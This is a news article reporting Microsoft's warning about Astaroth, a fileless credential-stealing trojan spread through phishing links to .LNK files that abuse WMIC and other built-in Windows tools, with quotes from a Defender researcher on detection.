Microsoft sounds the alarms over hard-to-detect Astaroth malware

MICROSOFT HAS SOUNDED the alarms over a new type of fileless malware, dubbed Astaroth, that can be installed on victims’ PCs without an executable.

Astaroth was first spotted in 2018 and detected in February this year in campaigns targeting Brazilian and European users. More recently, it was identified by Microsoft Defender ATP Research Team in May and June this year.

Astaroth features a key logger module, intercepts operating system calls and monitors the clipboard to steal sensitive data, such as keystrokes and credentials, from victims’ computers.

According to Microsoft, the perpetrators behind the Astaroth campaign are using what it describes as “living off the land techniques” to spread the malware, while making it difficult for antivirus and other security software to spot the attacks.

Microsoft’s security team noticed the recent campaigns after detecting an abrupt increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool.

A detailed analysis of those events by security experts revealed a campaign in which attackers sent out spam phishing emails with a link to a malicious .LNK shortcut file.

Running the .LNK file launches the legitimate WMIC tool as well as several other Windows tools that download more applications into system memory. These programmes were also found to be passing their output between each another without saving any data on the hard drive.

Finally, Astaroth is downloaded and run on the system. The Trojan dumps credentials for a wide variety of apps and also uploads the stolen information to a remote command-and-control server.

Because no file is saved on the hard drive throughout the infection operation, it makes it difficult for traditional antivirus software to detect any malicious code, according to Microsoft’s security experts.

“This technique is called living off the land: using legitimate tools that are already present on the target system to masquerade as regular activity,” said Andrea Lelli, a member of the Windows Defender ATP team.

“The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground,” she added.

Lelli added that being fileless doesn’t mean that the malware is invisible or undetectable: “Some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”